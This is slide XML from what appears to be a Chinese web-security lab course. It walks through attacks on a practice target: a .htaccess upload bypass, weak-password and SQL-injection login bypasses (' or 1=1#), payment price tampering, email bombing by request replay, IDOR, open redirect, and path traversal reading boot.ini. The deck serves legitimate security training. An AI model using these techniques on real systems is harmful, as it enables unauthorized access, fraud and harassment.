            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因为原作者写的代码可能有些问题，所以直接使用我们自己的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在附件中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C:\phpStudy\WWW\control\upload_file\upload_file_5.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>并且要将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>版本修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.2.17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上传任意文件结尾文件即可！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3110986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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-22_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>越权修改密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法一：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin/admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin/admin888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin/123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等作为弱口令进行暴力尝试登陆后修改密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法二：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用万能密码进行暴力破解登陆后修改密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ or 1=1# /</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36423682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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-23_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支付漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接抓包即可看到，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链接中也可以看到</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/auth_cross/cross_permission_pay.php?price=100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们可以将价格进行随意修改</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10213694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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-24_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>邮箱轰炸</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抓包分析：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>数据中只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>username=a@qq.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行抓包重放攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.sohu.com/a/322105042_120136504</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10494832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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-25_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>越权查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 用户中存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>aaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，我们用其进行登陆，由于不知道密码，我们尝试使用万能密码进行构造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>aaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’# /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码任意，登陆成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/auth_cross/cross_find2.php?id=2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 我们将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，此时显示的即为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/auth_cross/cross_find2.php?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31314012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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-26_URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/more/url_redirect.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在页面中找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转的，百度：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改其信息实现任意跳转</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24146600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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-26_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件包含漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/more/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>file_include.php?filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=../../template/dom_xss.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/more/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>file_include.php?filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=../../../../boot.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相关知识可参考：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/articles/web/182280.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35580152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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-27_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
